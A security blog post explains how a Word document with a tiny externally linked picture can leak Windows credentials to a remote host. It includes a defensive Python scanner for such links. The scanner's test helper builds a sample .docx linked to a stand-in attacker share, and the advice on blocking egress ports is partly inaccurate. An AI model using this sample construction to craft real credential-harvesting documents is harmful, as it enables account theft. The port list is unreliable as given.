So the defense (also known as the Blue Team) has been inundated with spam. The goal of the spam (for the hackers) is for an unsuspecting user to give up their credentials (username and password). Hackers are always trying to get your usernames and passwords.
Opening a Word document? What if it included a small file that is unlikely or even impossible to detect when first opening the document, because it gets resized to a small point in the document?
Notice the above image shows how to create a link inside a picture. The above image is from ISC.sans.edu.
So, due to various dirty tricks in spam, we have built 2FA (Two Factor Authentication) so that connecting to the email server and getting your email will effectively shut out the spam merchants… until now, with this nifty trick. (Do you have to re-establish 2FA every time you get email? Or only when first logging in?)
When you open the Word document the picture activates and tries to connect to criminal-hacker-website.com, and in the process the computer sends its credentials to criminal-hacker-website.com.
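The linked picture described above lives in the document's relationship file rather than in the visible content, so a defender can check for it before the document is ever opened. The following is an added example, not code from the original post: it treats the .docx as the zip archive it is, reads every `.rels` part, and reports relationships whose `TargetMode` is `External` and whose target is a UNC path or a remote URL. The `build_sample_docx` helper constructs a minimal sample document for offline testing; the hostname reuses the post's criminal-hacker-website.com and is not a real target.

```python
# Added example (not from the original post): find externally linked
# images/objects in a .docx before it is opened.
# A .docx is a zip; linked (not embedded) pictures appear in
# word/_rels/document.xml.rels as
#   <Relationship ... Target="\\host\share\x.png" TargetMode="External"/>
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"

# Targets that would make Word reach out to a share or a remote host.
UNC_OR_REMOTE = re.compile(r"^(\\\\|file:|https?:)", re.IGNORECASE)


def find_external_targets(docx_bytes: bytes) -> list[tuple[str, str]]:
    """Return (rels part, target) for every relationship marked External."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    findings.append((name, rel.get("Target", "")))
    return findings


def suspicious_targets(docx_bytes: bytes) -> list[str]:
    """External targets that point at a network share or a remote host."""
    return [t for _, t in find_external_targets(docx_bytes) if UNC_OR_REMOTE.match(t)]


def build_sample_docx(image_target: str) -> bytes:
    """Construct a minimal sample .docx (not a fully valid Word file) with one linked image."""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{IMAGE_REL}" '
        f'Target="{image_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a picture linked to a share on the post's example host.
    sample = build_sample_docx(r"\\criminal-hacker-website.com\share\pixel.png")
    for target in suspicious_targets(sample):
        print("external link found:", target)
```

Run it against real attachments by passing the file's bytes to `suspicious_targets`; a document that only carries embedded media has no `External` relationships and returns an empty list. Header and footer parts have their own `.rels` files, which is why the scan walks every `.rels` entry rather than only the main document's.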
Clearly a username-and-password-only defense is not going to do the job, as many tricks will pry your account information out of you. An incorrectly set up 2FA would also be a problem.
The defense must have a good logging and egress filter setup. (Block ports 445/tcp, 137/tcp, 139/tcp, 137/udp and 139/udp.)
Back to my question: “How are hackers always a step ahead of the defense?”
The answer actually lies in logic: if you have to defend 24 hours a day, every day, while trying to use software on the Internet, then it is only a matter of time before a hacker uses ingenuity to break or bypass your defenses, as shown above. We have to constantly be aware of new attacks, and thus of ways of defending against the new vulnerabilities found every day.
True, it would be nice if all software had no security issues, but as we know security is not the highest priority while making a product. Making money is, and sometimes a security audit is not high on the priority scale.
So it is the same old story: the “risk versus security” see-saw.
The people who focus on security might spend more in resources than others, so when you hear of a new potential attack, are you impulsively scoffing? Or are you saying “I have to learn this attack and defend against it” (thus spending resources)?
If you are scoffing, you are choosing to take on more risk by believing the security problems will go away just by thinking they will. The risk on the Internet these days is not that low; new attacks are coming so fast that if you have not upped your ante, one day it will be too late and the headlines will serve as your epitaph.